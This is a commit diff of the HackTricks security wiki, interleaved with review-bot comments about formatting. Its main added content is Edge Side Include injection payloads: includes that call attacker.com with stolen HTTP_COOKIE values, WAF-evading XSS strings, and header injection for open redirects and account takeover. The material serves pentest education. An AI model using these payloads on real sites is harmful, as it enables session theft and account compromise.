GitBook: [#3733] No subject
BIN
.gitbook/assets/image (21) (2) (1).png
Normal file
After Width: | Height: | Size: 42 KiB |
Before Width: | Height: | Size: 42 KiB After Width: | Height: | Size: 190 KiB |
Before Width: | Height: | Size: 190 KiB After Width: | Height: | Size: 113 KiB |
BIN
.gitbook/assets/image (4) (6).png
Normal file
After Width: | Height: | Size: 58 KiB |
Before Width: | Height: | Size: 58 KiB After Width: | Height: | Size: 76 KiB |
BIN
.gitbook/assets/image (5) (2) (2).png
Normal file
After Width: | Height: | Size: 65 KiB |
Before Width: | Height: | Size: 65 KiB After Width: | Height: | Size: 590 KiB |
Before Width: | Height: | Size: 590 KiB After Width: | Height: | Size: 91 KiB |
|
@ -106,7 +106,7 @@ The symbols: **+, -** and **{}** in rare occasions can be used for tagging and i
|
|||
|
||||
### Whitelist bypass
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../.gitbook/assets/image (4) (6).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### Quotes
|
||||
|
||||
|
|
|
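Review bot: the only change in this hunk is the figure source, `image (4).png` to `image (4) (6).png`, and the figure keeps `alt=""` and an empty `<figcaption>`; since the new filename carries no hint of which screenshot belongs to the "Whitelist bypass" section, add a short alt text or caption so a later asset rename can be checked against the content instead of by opening the file.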
@ -2,13 +2,13 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
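Review bot: the "Join the" bullet kept as context still links the 🐦 emoji to a malformed URL (`https://github.com/carlospolop/hacktricks/tree/7af18b62.../\[https:/emojipedia.org/bird/README.md`), and the identical line is repeated in the footer banner further down this commit; this sweep only moves `<strong>` inside the `<a>` tags and splits the bold around the repo links, so it is the right moment to point that emoji at `https://emojipedia.org/bird/` (the address embedded in the broken one), in both copies, as the 💬 link beside it already does.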
@ -25,7 +25,7 @@ And, when the page is served, this fragment will be evaluated and replaced with
|
|||
|
||||
The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served. SSI is a great way to add small pieces of information, such as the current time - shown above. But if a majority of your page is being generated at the time that it is served, you need to look for some other solution. (Definition taken from [here](https://httpd.apache.org/docs/current/howto/ssi.html)).
|
||||
|
||||
You can infer the presence of SSI if the web application uses files with the extensions ** `.shtml`, `.shtm` or `.stm`**, but it's not only the case.
|
||||
You can infer the presence of SSI if the web application uses files with the extensions \*\* `.shtml`, `.shtm` or `.stm`\*\*, but it's not only the case.
|
||||
|
||||
A typical SSI expression has the following format:
|
||||
|
||||
|
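Review bot: escaping the asterisks (`\*\* `.shtml`, `.shtm` or `.stm`\*\*`) does not repair the sentence, it only makes the literal `**` characters render; strong emphasis failed in the original because of the space after the opening `**`, so the intended fix is `**`.shtml`, `.shtm` or `.stm`**` with no space. While here, "but it's not only the case" reads awkwardly; "but that is not the only case" is clearer.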
@ -79,15 +79,19 @@ The following **header** in a response from the server means that the server is
|
|||
Surrogate-Control: content="ESI/1.0"
|
||||
```
|
||||
|
||||
If you can't find this header, the server might be using ESI anyways.\
|
||||
If you can't find this header, the server **might be using ESI anyways**.\
|
||||
A **blind exploitation approach can also be used** as a request should arrive to the attackers server:
|
||||
|
||||
```javascript
|
||||
// Basic detection
|
||||
<esi: include src=http://attacker.com
|
||||
hell<!--esi-->o
|
||||
// If previous is reflected as "hello", it's vulnerable
|
||||
|
||||
// Blind detection
|
||||
<esi:include src=http://attacker.com>
|
||||
|
||||
// XSS Exploitation Example
|
||||
<esi: include src=http://attacker.com/<XSSPAYLOAD.html>>
|
||||
<esi:include src=http://attacker.com/XSSPAYLOAD.html>
|
||||
|
||||
// Cookie Stealer (bypass httpOnly flag)
|
||||
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>
|
||||
|
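Review bot: the corrected XSS example drops the space in `<esi: include` and the stray angle brackets, but the same space remains in the basic-detection line `<esi: include src=http://attacker.com`, which also lacks its closing `>`; apply the same fix there. Two smaller points in the same block: the cookie-stealer line has a doubled query marker (`/?cookie_stealer.php?=`), and the fence is tagged `javascript` although the content is ESI markup with `//` comment lines, so tag it `markup` like the later ESI blocks in this file.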
@ -132,15 +136,36 @@ The file _http://attacker.com/xss.html_ may contain a XSS payload like `<script>
|
|||
|
||||
```markup
|
||||
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
|
||||
|
||||
Use <!--esi--> to bypass WAFs:
|
||||
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
|
||||
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
|
||||
```
|
||||
|
||||
#### Steal Cookie
|
||||
|
||||
* Remote steal cookie
|
||||
|
||||
```markup
|
||||
<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
|
||||
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
|
||||
```
|
||||
|
||||
* Steal cookie HTTP\_ONLY with XSS by reflecting it in the response:
|
||||
|
||||
```bash
|
||||
# This will reflect the cookies in the response
|
||||
<!--esi $(HTTP_COOKIE) -->
|
||||
# Reflect XSS
|
||||
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->
|
||||
```
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
* Full account takeover by reflecting cookies
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (21).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
#### Private Local File
|
||||
|
||||
Do not confuse this with a "Local File Inclusion":
|
||||
|
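Review bot: the new "Steal cookie HTTP_ONLY" block is fenced as `bash` while the block directly above it uses `markup`; both hold ESI directives and `<!--esi ... -->` comments, so use `markup` for both (the `#` lines are explanatory, not shell). The two figures added here (`image (4).png` and `image (21).png`) have empty alt text and captions; give each a one-line caption, especially since `image (4).png` is the very name the "Whitelist bypass" hunk above just moved away from, so a reader needs to know which screenshot is meant.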
@ -155,17 +180,35 @@ Do not confuse this with a "Local File Inclusion":
|
|||
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
|
||||
```
|
||||
|
||||
#### Open Redirect
|
||||
|
||||
The following will add a `Location` header to the response
|
||||
|
||||
```bash
|
||||
<!--esi $add_header('Location','http://attacker.com') -->
|
||||
```
|
||||
|
||||
#### Add Header
|
||||
|
||||
* Add header in forced request
|
||||
|
||||
```html
|
||||
<esi:include src="http://example.com/asdasd">
|
||||
<esi:request_header name="User-Agent" value="12345"/>
|
||||
</esi:include>
|
||||
```
|
||||
|
||||
#### CRLF in Add header (**CVE-2019-2438)**
|
||||
* Add header in response (useful to bypass "Content-Type: text/json" in a response with XSS)
|
||||
|
||||
****
|
||||
```bash
|
||||
<!--esi/$add_header('Content-Type','text/html')/-->
|
||||
|
||||
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
|
||||
```
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
#### CRLF in Add header (**CVE-2019-2438)**
|
||||
|
||||
```markup
|
||||
<esi:include src="http://example.com/asdasd">
|
||||
|
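Review bot: the heading `#### CRLF in Add header (**CVE-2019-2438)**` appears twice in this hunk, and the first occurrence sits above the `$add_header('Content-Type','text/html')` examples, which add a response header rather than demonstrate the CRLF case; retitle the first one (for example "Add header in response", matching its bullet) and keep the CVE heading only above the `<esi:include src="http://example.com/asdasd">` block that follows it. In both headings the closing parenthesis is inside the bold markers (`(**CVE-2019-2438)**` should be `(**CVE-2019-2438**)`), and the stray `****` line before the first fence is an empty emphasis pair that should be deleted. Minor: `text/json` in the bullet is not a registered media type; the header value seen in practice is `application/json`.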
@ -209,6 +252,7 @@ Check the XSLT page:
|
|||
* [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
|
||||
* [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
|
||||
* [https://academy.hackthebox.com/module/145/section/1304](https://academy.hackthebox.com/module/145/section/1304)
|
||||
* [https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91)
|
||||
|
||||
## Brute-Force Detection List
|
||||
|
||||
|
@ -216,12 +260,12 @@ Check the XSLT page:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -26,7 +26,7 @@ Usually, iButton implies the physical form of the key and reader - a round coin
|
|||
|
||||
When the key reaches the reader, the **contacts come to touch** and the key is powered to **transmit** its ID. Sometimes the key is **not read** immediately because the **contact PSD of an intercom is larger** than it should be. So the outer contours of the key and the reader couldn't touch. If that's the case, you'll have to press the key over one of the walls of the reader.
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (21) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### **1-Wire protocol** <a href="#1-wire-protocol" id="1-wire-protocol"></a>
|
||||
|
||||
|
|
|
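Review bot: the figure is repointed from `image (21).png` to `image (21) (2).png`; the BIN summary at the top of the commit shows `image (21).png` replaced by a file of a different size with the older content kept under the suffixed name, so this appears to keep the iButton page on its original screenshot, but a caption or alt text would make that verifiable without opening the asset. Unrelated to the rename, the context line "the contact PSD of an intercom is larger" uses an unexplained abbreviation ("PSD"), and "couldn't touch" should be "can't touch" to match the present tense of the surrounding sentence.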
@ -33,7 +33,7 @@ and if you **remove the 2 ms waiting** period between signals you can **reduce t
|
|||
|
||||
Moreover, by using the De Bruijn Sequence (a way to reduce the number of bits needed to send all the potential binary numbers to burteforce) this **time is reduced just to 8 seconds**:
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (5) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Example of this attack was implemented in [https://github.com/samyk/opensesame](https://github.com/samyk/opensesame)
|
||||
|
||||
|
|
|
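Review bot: the rename to `image (5) (2).png` is fine, but the context line above it spells "burteforce", which should read "brute-force"; also "Example of this attack was implemented in" needs an article and a present-tense verb ("An example of this attack is implemented in").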
@ -59,7 +59,7 @@ In AD environments, **clients interact with Enterprise CAs to request a certific
|
|||
|
||||
### Client Certificate Request Flow
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (5) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (5) (2) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
It's the process to **obtain a certificate** from AD CS. At a high level, during enrolment clients first **find an Enterprise CA** based on the **objects in the Enrolment Services** container discussed above.
|
||||
|
||||
|
|
|
@ -573,7 +573,7 @@ Now, since this registry key applies to Schannel, we must use the certificate fo
|
|||
|
||||
If we try to authenticate with the certificate and `-ldap-shell`, we will notice that we’re authenticated as `u:CORP\DC$`. This is a string that is sent by the server.
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (21) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../../.gitbook/assets/image (21) (2) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
One of the available commands for the LDAP shell is `set_rbcd` which will set Resource-Based Constrained Delegation (RBCD) on the target. So we could perform a RBCD attack to compromise the domain controller.
|
||||
|
||||
|
|